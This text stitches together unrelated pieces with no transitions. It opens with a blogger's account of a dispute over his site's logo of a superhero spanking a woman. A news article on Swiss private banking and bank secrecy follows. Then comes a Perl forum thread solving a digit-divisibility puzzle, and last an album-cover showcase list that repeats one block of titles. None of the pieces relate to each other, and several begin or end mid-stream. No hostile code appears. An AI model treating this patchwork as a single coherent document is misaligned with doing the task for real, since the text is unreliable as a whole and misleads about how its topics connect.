Which was interesting because Kit and I had discussed clarifying what PBH was about as we anticipated as we became more popular , people would be more speculative about the site .
We both fired off essays regarding our positions and why PBH was not intended to offend .
I sent the following back to Mirth :
Elizabeth :
No problem , you actually sparked something that needed to happen for a long time — which is an explanation of our site , its name , and its purpose .
There are two extensive entries dealing with both of your questions :
http://www.prosebeforehos.com/alec/04/30/what-is-pbh-part-1/
http://www.prosebeforehos.com/kit/04/30/what-is-pbh-part-2/
Thanks again , and if you have any other questions , do n’t hesitate to contact me .
Sincerely ,
Alec
This was followed by a quick response from Mirth :
Alec ,
Thanks for the reply .
I read your posts .
Ok here it is , straightup .
I have a couple of friends who are into the deconstructionist thing .
They express , much as you , wanting to avoid a bleak future as if they have no choice in how they will live their lives !
I find their talk sorta interesting but obscure and a little fuzzy and , thus , I do n’t get much from it .
In the case of your blog logo , why would would choose to go back to a 50s stereotypical and degrading image ?
You seem to reject one set of standards , yet choose another even more oppressive .
I ’m not going to link pbh because 1 ) I find a woman being spanked by a man offensive and 2 ) my readers will find a woman being spanked by a man offensive .
I do n’t mean to be insulting , but it ’s just a little too frat boy for us .
But , judging by the one poem of yours that I have read , I dig your work and I ’ll be looking for more at The Peace Tree .
Best ,
m / E
To which I replied :
Elizabeth : Best addressed by a paragraph in Kit ’s post —
“ The sharpest tool for rendering the sacred ordinary is humor and wit .
The image of the superhero spanking the woman attacks both traditional and Modern sensibilities .
It mocks the idea that a woman could be treated as a petulant child while also mocking the idea that these images are verboten .
While the traditional interpretation may be that the superhero represents all men and the woman all women , in a postmodern world could n’t the superhero represent the abstract ideal of the written word , and the woman represent all mankind ? ”
Thanks again for the link and I enjoy your blog as well !
Keep up the good work .
Always ,
Alec
Followed by the last email communication .
Alec ,
Here ’s what a nearly 20 - year age difference will do to opinions :
I do n’t think your logo mocks anything .
I think it perpetuates stereotype and oppression and is n’t females alone that are degraded by it .
And I ’m guessing Kit is not female , so add in gender to the difference thing .
I also think the logo cheapens what I ’ve seen of your work .
But that just me , being all blunt & stuff .
m / E
Fair enough — I would n’t agree with any of her assertions , but it was a normal , clean conversation .
Frankly , her point of ‘ I do n’t think your logo mocks anything ’ is wrong — we created this image and this blog , and we know the reasoning behind it .
We did n’t come up with convenient excuses because we are secretly misogynists in waiting , we sincerely created a logo with a superhero hitting a woman in the butt with a newspaper because it is nonsensical , non-traditional , and funny ( because superheros do n’t exist , and if they did , I presume they would n’t spend time hitting woman in the rear with newspapers ) .
Though the irony of bringing up the sex of the author as a means to attack the idea as sexist was apparently lost on her , I would like to point out that two of our five regular contributors are females , and I do n’t think any of our viewership had yet to explicitly find issue with our content .
Then I decided to comment on one of her blog posts dealing with a woman who thought she got sick from electrical appliances — nothing too controversial , just a typical comment spewing from me — “ Mirth : Nice find .
I need that headgear so I can finally get a full nights sleep without having to worry Dick Cheney will swoop through my window and suck my blood ” , which included my avatar ( the same image as the logo ) and a link to my WordPress blog .
And that ’s when the floodgates opened ( for a PDF with the whole transcripts of the thread , click here :
She wants a public debate on my ideas about PBH .
Not a problem , someone already elicits support for our “ everything goes ” mentality .
This is when the debate turns into a disagreement before I ’m even given a chance to respond with Mirth beating the drum for our supposed misogyny ( and by the way , before we even could get to this point , there were ten comments by the blog frequenters relating to hitting each other in the ass and who would like what ) :
And here you have it , we are of a 1950 ’s attitude and secret Republicans , and if you do n’t see what ’s terribly wrong with PBH , you probably are too .
And , I ’m not comfortable with women having power , or comfortable with women in general .
All of this easily assumed by looking at the logo for our website .
This is when I enter with a nice bit of sarcasm that pervades on PBH in attempt to get others to understand our brand of humor :
So , in a free and permissive society , we are free and permissive to do what we want as long as my expression does n’t step on your sensibilities .
Yet , everyone ’s evidence of our supposed ignorance and offense is my avatar and our website name .
Not once do they find any posts on our site that propose or encourage violence against women ( or anyone else for that matter as we are all pacifists ) .
And now , we are down the full path of enlightened discourse .
You see , it ’s only taken a little bit of bullying and eye - opening to jump to the conclusion that YES , PBH is in fact secret women - hating Republicans who harken back to their grandfathers days when a woman would be perpetually making dinner .
And from the preacher comes the final gospel :
So in one thread , we went to a reasoned discussion on the merits of having a SUPERHERO hit a woman in 50 ’s get up as a logo to discussions about how we were frat boys making light of child abuse and posting jokes about 9/11 .
In fact , the only post that came after mine was from Kit , who wrote an excellent rebuttal to the arguments presented by the LM crew :
The fact of the matter is that it is a superhero hitting a woman in the behind with a newspaper .
Let me repeat that just because I think that is hilarious , maybe if you say it out loud you will hear it .
It ’s a superhero hitting a woman in the behind with a newspaper .
Why do you relate to the woman being hit with the newspaper ?
Has a superhero hit you in the behind with a newspaper ?
Because if I ever saw that , that would be hilarious to me .
Also hilarious to me : * Men being hit in the behind by superheros
* Dogs being hit in the behind by superheros
* Inanimate objects being hit in the behind by superheros Basically any cartoon which involves a superhero paddling something with a newspaper , I would find funny .
Honestly , a superhero hitting something with a newspaper ?
Now to the point .
Obviously domestic abuse is not funny .
No one should live in fear of someone who supposedly loves them .
That ’s bullshit .
But really , if my dad were wearing a superhero costume and paddling my mom ( dressed in a 1950s dress ) with a newspaper , domestic abuse is not the first thing that would come to mind .
This comic is pure patriarchal kitsch , just like Soviet kitsch .
Unless they hate Jews , nobody really wants to live under Stalin .
But Soviet stuff is just a funny reminder of a bygone era of false ideals and failed dreams .
The white picket fence .
The home cooked meal waiting for the man returning home from a long day at the office .
The Ozzie and Harriet spotlessly clean and modern home .
“ What did you do at work today honey ? ” “ I oppressed you and millions of other women dear , simply by conforming to our traditional way of life . ”
“ That ’s nice , the kids are playing baseball down at the field . ”
This is as false of a past as the glorious triumph of global Communism .
People do n’t really want that shit .
People want true equality , the ability to make a life of their own .
But what does that mean ?
Where is the women ’s right movement today ?
Burning bras ?
Struggling to escape the kitchen ?
The truth is that the clear cut discrimination of the past is over with .
No one should disrespect a woman for any choice she makes .
And for the most part , no one will .
As I mentioned in my post on PBH , in order to properly understand the present and coming future , we must reexamine the baggage of the past .
Why does the superhero represent all men ?
Why does the woman represent all women ?
So the question Prose Before Hos asks is , are you a prose writin pro ? or a ho - baggin ho ?
I identify with prose , and I hope you do to .
The answer has nothing to do with sex .
A wise man once said do not trust anyone over 30 , and with reason .
But a wiser man would say , do n’t trust anyone to laugh at something when they are consumed with taking out their personal problems on others , because a superhero hitting a woman with a newspaper is fucking funny .
THIS is the opportunity of a lifetime to hire more private bankers , says Alex Widmer , chief executive of Bank Julius Baer , part of Switzerland 's third - biggest banking group .
Baer added 49 bankers to its ranks in the first six months of the year , most of them snatched from UBS and Credit Suisse , its bigger , credit - crunched rivals .
It plans to add as many as 60 more this year .
Sarasin & Cie , another Swiss bank , is on a similar hiring spree .
Such expansionism may look rather brave , given recent attacks from American and German tax authorities on private - banking practices .
On July 17th a Senate subcommittee raked through allegations that two particular banks , LGT Bank of Liechtenstein and UBS , had helped wealthy Americans to evade taxes .
A contrite UBS witness said that since November the bank had stopped sending its private bankers from Switzerland to America to advise American taxpayers .
The risk of their infringing regulations on what they may or may not sell was judged too great .
“ I hope that other Swiss banks will take notice , ” said the committee 's chairman .
They may well .
The bigger Swiss banks have the option of serving their clients onshore : UBS has more than 32,000 employees in America .
For other Swiss banks it is possible and legal to deal with American taxpayers as a “ qualified intermediary ” , but the rules are complex .
Baer gave up the struggle in 2005 and sold its American operation — to UBS .
But the model of Swiss banking secrecy — Mr Widmer calls it “ client confidentiality ” — still has plenty of life in it .
Since July 2005 , Swiss banks have levied tax on behalf of European Union governments on interest - related income earned by their countries ' taxpayers with accounts held in Switzerland .
But the revenue is puny , around SFr500 m ( $ 480 m ) so far , and the directive covers only bonds and deposits .
It can be sidestepped by bundling the assets into a fund or by booking them at an offshore centre outside Europe .
The real growth areas for private banking are in any case farther afield , in Asia and eastern Europe .
A new Baer office in Jakarta will be followed by others in Cairo and Istanbul .
The smaller banks have a particular incentive to fight for the model .
Michel Habib , a professor of banking at Zurich University , has calculated the value of bank secrecy from the impact of news that it might be abolished on the share price of listed Swiss banks .
Answer : 8 - 13 % of their market capitalisation for the smaller banks , but very little for UBS or Credit Suisse ( which on July 24th reported decent results and is also hiring staff ) .
Swiss banking secrecy has been under pressure for 15 years and will come under more , says Mr Widmer , but the model is sound .
Polls suggest that 81 % of the Swiss oppose abolition .
Whatever the Americans say .
You appear to be making some of the mistakes the author said you needed to avoid - namely , you are n't really cutting down your search space .
You 're still performing all these checks on every single number ; it would be better to only form the numbers that pass the checks mentioned in comments at the top , rather than to form all numbers and then reject those that fail .
Not only that , but you 're doing some stuff that does n't make sense - you could replace your check code with this routine and it would still accept / reject the same numbers but would be tons faster : sub passes { my $ test_number = shift ( ) || die " no test number " ; return 0 if ( $ test_number =~ /0/ ) ; # no zero return 0 if ( $ test_number =~ /(. ) .*\1/ ) ; # no dups for ( split ( / / , $test_number ) ) { return 0 unless $ test_number % $ _ == 0 ; } return 1 ; } [ download ]
The check about 5 and even numbers is redundant by the point you do it , since if it has 5 and an even number then it either has a 0 or will be rejected by the divisibility test .
So what you need to do is cut down on the number of possibilities to begin with .
Say , something like this : use strict ; sub pass_divcheck { # dups and 0s are assumed already handled my ( $ test_number ) = @_ ; for ( split ( / / , $test_number ) ) { return 0 unless $ test_number % $ _ == 0 ; } return 1 ; } sub form_number { my ( $ num , @remaining_digits ) = @_ ; print " $num
" if pass_divcheck ( $num ) ; #
When dealing with the three low - order digits , we can eliminate som + e # possibilities .
E.g .
Any number divisible by 4 must end in a 2 - dig + it # number divisible by 4 . my $ ndig = length ( $ num ) ; if ( $ndig == 1 ) { if ( $ num % 2 !=
0 ) { @remaining_digits = grep ( $_ % 2 , @remaining_digits ) ; } # After we have one digit , either 5 is already used or we # can't use 5 later anyway @remaining_digits = grep ( $_ % 5 , @remaining_digits ) ; } elsif ( $ndig == 2 ) { if ( $ num % 4 !=
0 ) { @remaining_digits = grep ( $_ % 4 , @remaining_digits ) ; return if ( $ num =~ /[ 48 ] / ) ; } } elsif ( $ndig == 3 ) { if ( $ num % 8 !=
0 ) { @remaining_digits = grep ( $_ % 8 , @remaining_digits ) ; } } my $ maxp = $ #remaining_digits ; foreach my $ p ( 0..$ maxp ) { form_number ( $remaining_digits [ $p ] . $ num , @remaining_digits [ 0..$ p - 1 ] , @remaining_digits [ $ p+1..$m + axp ] ) ; } } form_number ( '' , ( 1..9 ) ) ; [ download ]
Note that this code wo n't print the answers out in numerical order .
You 'll have to sort them with something else .
Update :
Got rid of some extraneous code that does n't add much since the answers do n't get generated in numerical order anyway .
@/=map{[/./g]}qw/.h_nJ
Xapou cets krht ele_ r_ra / ; map{y / X_/
/;print}map{pop@$_}@/for@/ [ download ] --
I must say , I 'm a bit surprised by the times other people are getting - as written above , my program takes about 1 second on my relatively underpowered laptop .
( 1.3 Ghz Pentium something , 512 MB ram )
Even if you simplify my program down by removing both " elsif " blocks you 're only up to about 2.5 seconds .
Removing the " if ( $ndig == 1 ) " block does bring you up to 34 seconds .
@/=map{[/./g]}qw/.h_nJ
Xapou cets krht ele_ r_ra / ; map{y / X_/
/;print}map{pop@$_}@/for@/ [ download ] --
As noted by others , if the answer includes a 5 it must end in 5 , which would preclude all of 2 , 4 , 6 and 8 .
However you may also spot that the digits 12346789 do not have a sum divisible by 3 , so we must lose a 1 , 4 or 7 to avoid losing all of 3 , 6 and 9 .
Of those , only 4 leaves us a digit sum divisible by 9 , so if a 7 - digit solution is possible it must consist of 1236789 .
The gcd of those digits is 7 * 8 * 9 = 504 , so we can start at 504 * int( 9876321/504 ) , and work down in steps of 504 until we find a multiple that consists of the right set of digits ; as it turns out , just 17 such steps take us to the answer , and we could reasonably do that much by hand ( though I did n't :) .
Hugo
This was my take too .
Since we start with an even number , and subtract an even number , we do n't have to worry about ending in an odd digit .
Since we know that all allowed digits will divide any multiple of 504 , we do n't even test for that .
Here 's the code I wrote ( somewhat inspired by previous posts ) : #!/ your / perl / here use strict ; use warnings ; use Benchmark : : Timer ; my $t = Benchmark : : Timer -> new ( ) ; $t -> start ( ) ; my $ c = 7 * 8 * 9 ; my $ x = $c * int( 9876321 / $ c ) ; my $ steps = 0 ; while ( $x > 0 ) { next if $ x =~ /[ 05 ] / ; # no 0 or 5 next if $ x =~ /( [ 1 - 9 ] ) .*\1 / ; # no repeated digits last ; } continue { $ x -= $ c ; $ steps + + ; } $t -> stop ( ) ; print " $x ( $ steps steps )
" ; print $t -> report ( ) ; __OUTPUT__ 9867312 ( 17 steps ) 1 trial of _default ( 64us total ) [ download ] -QM
--
Quantum Mechanics :
The dreams stuff is made of
The answer looks to be 1687392 .
Took my P4 1.7 w/384 M about 3 seconds to run it .
Read more ... ( 690 Bytes )
My criteria for good software : Does it work ?
Can someone else come in , make a change , and be reasonably certain no bugs were introduced ?
My criteria for good software :
I 'd be very surprised if that is the largest .
I 'm sure it is among the longest .
But I 'd bet money that the largest starts with a 9 , and I 'd bet a lot of money that it does n't start with a 1 .
Update : I did n't notice it was only 7 digits until I wrote a short script that showed that there is no 9 - digit answer , which surprised me -- but it 's too early for clear thinking ATM :) .
I should have noted that I looked at the code and it does n't appear to look for the largest answer , just the first answer that it finds ( and it does n't look at the possible answers from largest to smallest ) .
Update2 : And here is the quick hack showing the first block that failed to find any 9 - digit answer and then an added block to find the answer .
Note that this code searches the potential solutions in order from largest to smallest so it can stop as soon as one answer is found .
It is n't particularly fast to run ( taking 14 seconds ) , but it was very fast to write . ( : use Algorithm :: Loops qw ( NextPermuteNum ) ; my @digs= ( 1..9 ) ; my @map ; @map [ 1..9 ] = reverse 1..9 ; do { my $ num= join '' , @map [ @digs ] ; for ( 9 , 8 , 7 , 5 , 0 ) { die " $num
" if ! $ _ ; last if 0 != $ num % $ _ ; } } while ( NextPermuteNum( @digs ) ) ; my $ prev= 0 ; for my $ len ( reverse 1..8 ) { do { my $ num= substr ( join ( '' , @map [ @digs ] ) , 0 , $ len ) ; if ( $ num != $ prev ) { for ( $ num =~ /./g , 0 ) { die " $num
" if ! $ _ ; last if 0 != $ num % $ _ ; } } $ prev= $ num ; } while ( NextPermuteNum( @digs ) ) ; } [ download ] - tye
tye ,
I borrowed Algorithm : : Loops for the following brute - force approach : #!/usr / bin/perl use strict ; use warnings ; use Algorithm : : Loops qw / NestedLoops NextPermute / ; my $ max = 1 ; my $ next = GenPowerSet ( 9 ) ; while ( my @list = $ next - >( ) ) { PERMUTE : while ( NextPermute ( @list ) ) { my $ num = join '' , @list ; next PERMUTE if $ num < $ max ; for ( @list ) { next PERMUTE if $ num % $ _ ; } $ max = $ num if $ num > $ max ; } } print $ max ; sub GenPower
Set { my $ end = shift ; return NestedLoops ( [ [ 1..$ end ] , ( sub { [ $ _+1 .. $ end ] } ) x $end , ] , { OnlyWhen => 1 , } , ) ; } [ download ]
It came up with 9_867_312 in about 30 seconds .
Cheers - L~R
Note that you can cut the time in half or there abouts by adding just two simple checks ; this version of your program runs in 6.1 seconds on my machine - the original without the initial 9 - digit loop takes 13 seconds on my machine : use Algorithm : : Loops qw ( NextPermuteNum ) ; my @digs= ( 1..9 ) ; my @map ; @map [ 1..9 ] = reverse 1..9 ; my $ prev= 0 ; for my $ len ( reverse 1..8 ) { do { my $ num= substr ( join ( '' , @map [ @digs ] ) , 0 , $ len ) ; if ( $ num != $ prev and $ num !~ /[ 2468 ] .*[ 13579 ] $ / and $ num !~ / + 5 ./) { for ( $ num =~ /./g , 0 ) { die " $num
" if ! $ _ ; last if 0 != $ num % $ _ ; } } $ prev= $ num ; } while ( NextPermuteNum( @digs ) ) ; } [ download ]
Note that all I 've done is add two regex tests - that you do n't have any even digits if the last digit is odd , and that you never have a 5 in any but the last position .
Reducing the search space is almost always a good idea .
@/=map{[/./g]}qw/.h_nJ
Xapou cets krht ele_ r_ra / ; map{y / X_/
/;print}map{pop@$_}@/for@/ [ download ] --
If it 's the longest it's also the largest given the fact that ( leading ) zeroes are not allowed .
OTOH : It 's neither ;-) s$ $ ( [} , &%#}/&/]+}%&{} )*;#$ &&s&&$ ^X . ( $ '^ " %]=\&(| ?*{%
+ .+=%;.#_}\&" ^ "-+%*).}%:##%}={~=~:. " ) &e&&s " " `$ ''` "e
Some minor changes to your code results in 9867312 .
Took my P4 3.2 w/4GB about 9.3 seconds to run it .
Read more ... ( 873 Bytes )
Ahh !
I see the error .
If I had both 4 and 2 , but not 8 , I was requiring the divisor to be a multiple of 8 .
Good catch !
My criteria for good software : Does it work ?
Can someone else come in , make a change , and be reasonably certain no bugs were introduced ?
My criteria for good software :
No it 's not .
Try my program .
( which spits out all the answers in under 1.5 seconds )
As proof that yours is n't the largest , consider 9231768 ( also not the largest ) : $ bc -l bc 1.06 Copyright 1991 - 1994 , 1997 , 1998 , 2000 Free Software Foundation , Inc .
This is free software with ABSOLUTELY NO WARRANTY .
For details type `warranty ' .
9231768 / 8 1153971.00000000000000000000 9231768 / 9 1025752.00000000000000000000 9231768 / 7 1318824.00000000000000000000 [ download ]
( The other digits follow as a consequence , or you can check them yourself )
@/=map{[/./g]}qw/.h_nJ
Xapou cets krht ele_ r_ra / ; map{y / X_/
/;print}map{pop@$_}@/for@/ [ download ] --
Clever simplification .
If the number is divisible by 9,8,7 , and 5 , then it must also be divisible by 4,3,2 , and 1 .
At first I thought you forgot about the divide by 5 test , but the I saw that your number does n't contain 5 .
Clever !
I used Math : : Combinatorics for both parts and a slight modification of the original test to get the answer ( 9867312 ) in less time than it takes to make a coffee ... use strict ; use warnings ; use Math : : Combinatorics ; my @n = qw ( 1 2 3 4 6 7 8 9 ) ; my $ found ; foreach my $ count ( reverse ( 1..@n ) ) { my $ combinat = Math :: Combinatorics -> new ( count => $ count , data => [ + @n ] , ) ; my @comb ; while ( @comb = $ combinat ->next_combination ( ) ) { my @permu ; my $ permute = Math :: Combinatorics ->new ( data => [ @comb ] ) ; while ( @permu = $ permute ->next_permutation ( ) ) { if ( passes ( @permu ) ) { print " @permu
" ; $ found ++ ; } } } exit if $ found ; } sub passes { my $ test_number = join '' , @_ ; for ( @_ ) { return 0 unless $ test_number % $ _ == 0 ; } return 1 ; } [ download ] update I have modified my original code taking the 5 out of the possible numbers and paring down the test as much as possible .
This now runs much faster .
Hmm , I 'm impressed by the code , and will be poring over those cool modules you used to try to understand what you did , but I finally gave in and googled around , and the answer appears to be more along the lines of what tye said .
I do n't really know threads but I wonder ... could threads speed this up ?
Threads do n't magically enhance the power of a processor .
If you only have one processor , and it's not sleeping while some device is slow to respond , then it can't suddenly get any more effective by spinning off multiple threads .
Threads are useful for performance only when various parts of the process must sleep to await further data , but other parts of the process can continue to produce those data .
Threads are useful for design because they let you segment out the problem into loosely - coupled components , and you do n't have to design a time - slicing pump to accomplish it .
--
[ e d @ h a l l e y . c c ]
My attempt : #!/usr /bin/perl use strict ; use warnings ; my @digits= qw(9 8 7 6 5 4 3 2 1 ) ; my $ max= 0 ; permut ( '' , @digits ) ; print " Solution : $ max
" ; sub permut { my ( $s , @digits ) = @_ ; my $ i= scalar @digits ; DIV : { { no warnings ; last DIV if $ s < $max ; } foreach my $ i ( split // m , $s ) { last DIV if $s % $ i ; } print " $s
" ; $ max=$s ; } if ( $ i ) { while ( $ i --) { my $ f= shift @digits ; permut ( $s.$f , @digits ) ; push ( @digits , $ f ) ; } } } [ download ]
My solution and the time needed on a 900MHz Power PC G3 with 640MB and lot 's of Java running in the background ;-) is :
9867312
real 2m14.144s
user 0m32.100s
sys 0m0.730s
s $ $([} , &%#}/&/]+}%&{} )*;#$ &&s&&$ ^X . ( $ '^ " %]=\&(| ?*{%
+ .+=%;.#_}\&" ^ "-+%*).}%:##%}={~=~:. " ) &e&&s " " `$ ''` "e
This is reasonably fast .
It pre-generates the whole list of candidates , so it 's surely not the best .
The optimization of making 5 and even numbers mutually exclusive makes a huge difference .
sub perms { return ( ) unless @_ ; my ( $ car , @cdr ) = @_ ; # All permutations that do not include car my @cdr_perm = perms ( @cdr ) ; #
All permutations that include car my @car_perm = map { my $ this_perm = $ _ ; map { substr ( $ this_perm , 0 , $ _ ) . $ car . substr ( $ this_perm , $ _ ) } 0.. length ( $ this_perm ) } ( @cdr_perm ) ; ( @car_perm , @cdr_perm , $ car ) ; } my $ max = 0 ; OUTER : for my $ num ( perms ( reverse ( 1..4,6..9 ) ) , perms ( 9,7,5,3,1 ) ) { next unless $ num > $ max ; my @digits = split // , $ num ; $ num % $ _ > 0 and next OUTER for @digits ; print " $num is divisible by all of @digits
" ; $ max = $ num ; } print " Biggest found is $ max
" ; [ download ]
Caution : Contents may have been coded under pressure .
This looks like fun , so I 've had a go :)
Read more ... ( 1279 Bytes ) Update : Well , I 'd now like to stake my claim as having come up with the slowest solution that gets the correct answer , and here is my evidence :
Trying 9867312 ... Success !!
9867312 / 9 = 1096368 9867312 / 8 = 1233414 9867312 / 6 = 1644552 9867312 / 7 = 1409616 9867312 / 3 = 3289104 9867312 / 1 = 9867312 9867312 / 2 = 4933656 real 384m53.120s user 382m59.960s sys 0m14.600s [ download ]
Almost 6.5 hours , I imagine that would have been quite impressive in the late 50's :D
Arggh , I went to fix a bug and accidentally deleted the whole post .
No need for modules use strict ; use warnings ; my $ limit = 987654321 ; my $ magic_num = 9 * 8 * 7 ; my $ max = int ( $ limit / $ magic_num ) ; my $ start = $ max * $ magic_num ; for ( 0..$ max - 1 ) { my $ num = $ start - $ magic_num * $ _ ; next if $ num =~ /[ 05 ] / ; next if $ num =~ /(. ) .*\1/ ; die " $num
" } [ download ]
Many good replies above , but figured I 'd try it for myself with the help of CPAN .
Looks like it runs plenty fast enough with brute force alone .
Fun .
#!/usr/bin/perl -w # # See http://perlmonks.org/?node_id=503317, Oct 27 2005 # Jim Mahoney ( mahoney@marlboro.edu ) # use strict ; use warnings ; use Algorithm : : FastPermute qw( permute ) ; use Math : : Combinatorics qw( ) ; my $ debug = 0 ; my $ largest = 0 ; my @solutions ; my $ start_time = time ( ) ; print " What is the largest integer whose digits are all different ( and do not include 0 ) that is divisible by each of its individual di + gits ?
Working ... " ; for my $n ( reverse 1..9 ) { my $c = Math :: Combinatorics -> new ( count= > $n , data= > [ 1..9 ] ) ; while ( my @array = $ c ->next_combination ) { permute { remember ( @array ) if is_solution ( @array ) } @array ; } } @solutions = sort @solutions ; print " Done in " . ( time ( ) - $ start_time ) . " seconds .
Total number of solutions found is " . scalar ( @solutions ) . " .
Largest is " . $ solutions [ - 1 ] . " . " ; sub remember { my @digits = @_ ; push @solutions , join ( '' , @digits ) ; } sub is_solution { my @digits = @_ ; my $ number = 0 + join ( '' , @digits ) ; for my $ digit ( @digits ) { return 0 if $ number % $ digit != 0 ; } return 1 ; } __END__ $ ./n_digits_divide.pl
What is the largest integer whose digits are all different ( and do not include 0 ) that is divisible by each of its individual di + gits ?
Working ...
Done in 6 seconds .
Total number of solutions found = 548 .
Largest found was 9867312 . [ download ]
Mine is very slow , but short .
I wrote it before reading the rest of the thread .
I figured that we knew the answer had at most 8 characters , as it could n't have both 2 and 5 , so I counted down from the largest 8 - different - digit number , guessing the answer would be closer to the top than the bottom .
I realized that checking both 9 , 8 , 6 and their divisors was a waste , but guessed that the logic to exclude those would outweigh the extra modulos .
LOOP : for ( my $ i = 98765432 ; $ i > 0 ; $ i--) { next if $ i =~ /0 / or $ i =~ /( \d ) \d*\1 / ; $ i % $ _ and next LOOP for split '' , $ i ; print " $i
" ; exit ; } [ download ]
Updated : Re-worded the last sentence to correct a word - processing -o .
This is based on what you did , except it prints out a status bar for " time remaining . "
Well , actually not a status bar .
Just something along the lines of On 22000000 .
Minutes required : 0.718182 On 21000000 .
Minutes required : 0.683761 On 20000000 .
Minutes required : 0.645359 On 19000000 .
Minutes required : 0.611250 ........ [ download ]
I think I liked yours the best because it was the closest in spirit to my , even slower , initial attempt .
Cheers :) use strict ; use warnings ; my $ start = 98765432 ; my $ start_time = time ; my $ div = 1000000 ; my $ max_tries = ( ( $ start - ( $ start % $ div ) ) / $ div ) ; my $ tries ; LOOP : for ( my $ i = $ start ; $ i > 0 ; $ i--) { if ( $ i % $ div == 0 ) { $ tries ++ ; my $ tries_remaining = $ max_tries - $ tries ; # print " tries re + maining : $ tries_remaining
" ; my $ seconds_per_tries = ( time ( ) - $ start_time ) / $ tries ; my $ estimated_minutes_to_completion = $ seconds_per_tries * $ tr + ies_remaining / 60 ; $ estimated_minutes_to_completion = sprintf ( " % 2f " , $ estimated + _minutes_to_completion ) ; print " On $ i .
Minutes required : $ estimated_minutes_to_completi + on
" ; } next if $ i =~ /0 / or $ i =~ /( \d ) \d*\1 / ; $ i % $ _ and next LOOP for split '' , $ i ; print " $i
" ; exit ; } [ download ]
I got the 9867312 answer in about 10 minutes , using just thinking and a calculator .
Sure , the brain is slower than the PC but probably the overall time to write the program and run it is more than 10 minutes :)
Heuristics : - the number must have at most 9 digits - 5,2 mutually exclusive ( 0 in the end ) - 5,4 mutually exclusive ( 0 in the end ) - 5,8 mutually exclusive ( 0 in the end ) => 5 probably not in - the remaining are 1 2 3 4 6 7 8 9 - 9 divides a number iff the sum of its digits is divisible by 9 , same goes for 3 and 6 - the sum of these digits is 40 , so if you take 4 out , it is 36 , so we can have a number with 1 2 3 6 7 8 9 divisible by 1 3 6 9 independently of the digits ' order - place 2 last so that the resulting number is divisible by 2 - you want it to be the largest , so first try 9876312 - it wo n't work , and after a few trials and some luck you get the right answer which is 9867312
About The Author Ashley Ringrose is better known as Mr. Truffle and editor of Sleevage , a music design blog .
He occasionally plays with Mr. Potatoheads and dresses up in … More about Ashley Ringrose …
35 Beautiful Music Album Covers
Smashing Newsletter
Every week , we send out useful front - end & UX techniques .
Subscribe and get the Smart Interface Design Checklists PDF delivered to your inbox .
Your ( smashing ) email Subscribe →
Album cover art is often considered to be one of the “ extincted ” fields in modern graphics design .
In times when digital copies are cheaper and quicker to get , album covers have somehow lost their importance as less and less customers actually buy CDs and LPs in the stores .
That ’s a pity because album covers can be extremely expressive and convey the message of the album in a number of creative ways .
This post attempts to prove exactly that .
Album cover art is often considered to be one of the extinct fields in modern graphics design .
In times when digital copies are cheaper and quicker to get , album covers have somehow lost their importance as less and fewer customers buy CDs and LPs in the stores .
That ’s a pity because album covers can be extremely expressive and convey the message of the album in some creative ways .
This post attempts to prove exactly that .
Music and art go hand in hand .
And the best way to get a potential buyers ’ attention is with an eye - catching album cover .
We all know you ca n’t just judge a book by its cover , but it does n’t hurt to give a CD a spin based on a sexy piece of art .
Below we present 35 excellent examples of beautiful , creative and impressive album covers that will certainly inspire you to head down to the local record shop and start browsing through records and labels .
We have tried to address various cover designs and present both CD covers and LP covers from the 60s to 2000s .
However , some excellent album covers are missing .
Please let us know about them in the comments to the post !
Further Reading on SmashingMag :
Album Covers
The Mars Volta “ Frances the Mute ”
Danger Doom - The Mouse and the Mask
Michael Jackson : Dangerous by Mark Ryden
Devil ’s Gun - Raising The Beast
Smashing Pumpkins : Zeitgeist by Shepard Fairey
Keane : Under The Iron Sea by Sanna Annukka
Kisschasy : United Paper People by Debaser
Editors : The End Has a Start by Idris Khan
Electric Light Orchestra -
Out of the Blue
Ground Components : An Eye for a Brow , A Tooth for a Pick by Jonathan Zawada
Arcade Fire : Funeral
Kool and the Gang - Still Cool
Pink Floyd - Dark Side of the Moon 1973
Gallows : In The Belly of a Shark by Dan Mumford
Muse - Origin of Symmetry
Linkin Park - Reanimation
Lemon Jelly : Lost Horizons by Airside
Tool : 10,000 Days
Circa Survive : On Letting Go
The Last Goodnight - Poison Kiss
Pink Floyd - The Division Bell
Thom Yorke : The Eraser by Stanley Donwood
Godspeed You !
Black Emperor - Lift Your Skinny Fists Like Antennas to Heaven
Architecture in Helsinki : Places Like
This by Will Sweeney
The Chemical Brothers : Push the Button by Tappin Gofton
Rolling Stones - Forty Licks
Rafale : Rock It , Do n’t Stop
It by Akroe
Dream Theater - Scenes from the memory
Guns N’ Roses - Appetite for Destruction
Relayer : Yes
Coldplay - Viva La Vida
New Order - Power , Corruption and Lies Designed by one of today ’s most influential designers Peter Saville
Soulwax - Nite Versions
Pixies - Doolittle
Deerhunter - Cryptograms
Hot Chip - The Warning
Muse - Absolution
The Police - Ghost In The Machine
Led Zeppelin - Physical Graffiti
DJ Shadow - Endtroducing …
Wow - Moby Grape
Genji Siraisi : Censorsh!t by Razauno
Radiohead - Hail to the Thief
VHS Orbeta - Bring On The Comets
Van Halen - 1984
Fort - Minor - The Rising Tied Front
The Roots - Game Theory
Led Zeppelin - Mothership
Nick Drake - Pink Moon
The Cribs - Men ’s Needs , Women ’s Needs , Whatever
Deerhunter - Cryptograms
Hot Chip - The Warning
Muse - Absolution
The Police - Ghost In The Machine
Led Zeppelin - Physical Graffiti
DJ Shadow - Endtroducing …
Wow - Moby Grape
Genji Siraisi : Censorsh!t by Razauno
Radiohead - Hail to the Thief
VHS Orbeta - Bring On The Comets
Van Halen - 1984
Fort - Minor - The Rising Tied Front
The Roots - Game Theory
Led Zeppelin - Mothership
Nick Drake - Pink Moon
The Cribs - Men ’s Needs , Women ’s Needs , Whatever
Elton John - Captain Fantastic And The Brown Dirt Cowboy
XTC - Drums and Wires
Queens Of The Stone Age : Era Vulgaris by Morning Breath Inc
Beck : The Information by Big Active and you
“ The album was issued with a blank sleeve and booklet and one of four different sheets of stickers for fans to make their own album art .
Beck explained to Wired magazine he wanted no two copies of the CD cover to be the same : “ The artwork is going to be customizable .
The idea is to provide something that calls for interactivity . ”
However , because the unique album art concept was seen as a gimmick to bolster retail sales , The Information was deemed ineligible to enter the UK Albums Chart . ”
Last Click
The World ’s First Album Cover Alex Steinwess , a then 23 years old designer , convinced Columbia ’s suits to create the first true album cover .
Until then , 78s were sold in generic sleeves .
Please notice that there is the word “ smash ” on
Related posts
You may want to take a look at the following related posts :
